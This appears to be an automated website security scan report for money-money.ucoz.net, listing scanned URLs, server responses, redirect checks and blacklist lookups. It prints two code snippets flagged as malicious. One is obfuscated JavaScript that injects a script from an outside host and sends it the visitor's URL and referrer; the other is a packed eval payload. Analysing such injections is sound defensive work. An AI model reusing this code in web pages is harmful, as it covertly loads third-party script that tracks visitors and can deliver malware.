Scanned pages/files
| Request | Server response | Status |
http://money-money.ucoz.net/ | 200 OK Content-Length: 27582 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lankru_html = ''; lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" '; lankru_html += 'src="http://kna' + 'lru.ru/js.php?id=7089'; lankru_html += '&dd=3&url=' + encodeURIComponent(document.location); lankru_html += '&ref=' + encodeURIComponent(document.referrer); lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>'; document.write(lankru_html); Antivirus reports:
| ||
http://libertytraffic.ru/selljs/?id=42 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 18 Jul 2015 03:41:46 GMT Location: http://www.libertytraffic.ru/selljs/?id=42 Server: Apache/2.2.15 (CentOS) Content-Length: 333 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.libertytraffic.ru/selljs/?id=42 | 200 OK Content-Length: 2705 Content-Type: text/html | clean |
http://www.libertytraffic.ru/test404page.js | 404 Not Found Content-Length: 2013 Content-Type: text/html | clean |
http://www.libertytraffic.ru/files/scripts.js | 200 OK Content-Length: 20001 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('k c={3z:\'12/7G/\',4r:"8l.5p",2P:\'7J.7F\',67:10,5N:70,6P:10,6G:70,6B:S,6v:S,4S:1,2B:17,5u:3,3K:10,5T:35,5F:10,5C:35,3y:8b,6M:\'Ðàçâåðíóòü âî âñþ âåëè÷èíó\',5o:\'Íàæìèò hs.graphicsDir = ''; hs.outlineType = ''; window.onload = function() { hs.preloadImages(1); } function popUP(url,width,height) { if(!width) { width = 600; } if(!height) { height = 400; } var posx = 200; var posy = 200; var w=window.open(url,'wind','left='+posx+',top='+posy+',width='+width+',height='+height+',status:no, help:no'); return false; } Antivirus reports:
| ||
http://www.libertytraffic.ru/ | 200 OK Content-Length: 23449 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/cap/jsstuff/jquery.cycle.all.js | 200 OK Content-Length: 52236 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/cap/jsstuff/jquery.topheader.js | 200 OK Content-Length: 2796 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/scripts/jquery.easyAccordion.js | 200 OK Content-Length: 6801 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/scripts/utility.js | 200 OK Content-Length: 449 Content-Type: text/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 260803 Content-Type: text/javascript | clean |
http://u.begun.ru/begun.js | 200 OK Content-Length: 3793 Content-Type: application/x-javascript | clean |
http://www.libertytraffic.ru/unlimited/ | 200 OK Content-Length: 41917 Content-Type: text/html | clean |
http://www.libertytraffic.ru/unlimited/jquery/jquery.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: money-money.ucoz.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Jul 2015 03:41:46 GMT
Server: uServ/3.2.2
Content-Length: 27582
Content-Type: text/html; charset=UTF-8
...27582 bytes of data.
GET / HTTP/1.1
Host: money-money.ucoz.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Jul 2015 03:41:46 GMT
Server: uServ/3.2.2
Content-Length: 27582
Content-Type: text/html; charset=UTF-8
...27582 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: money-money.ucoz.net
Referer: http://www.google.com/search?q=money-money.ucoz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: money-money.ucoz.net
Referer: http://www.google.com/search?q=money-money.ucoz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=money-money.ucoz.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://money-money.ucoz.net/
Result: money-money.ucoz.net is not infected or malware details are not published yet.
Result: money-money.ucoz.net is not infected or malware details are not published yet.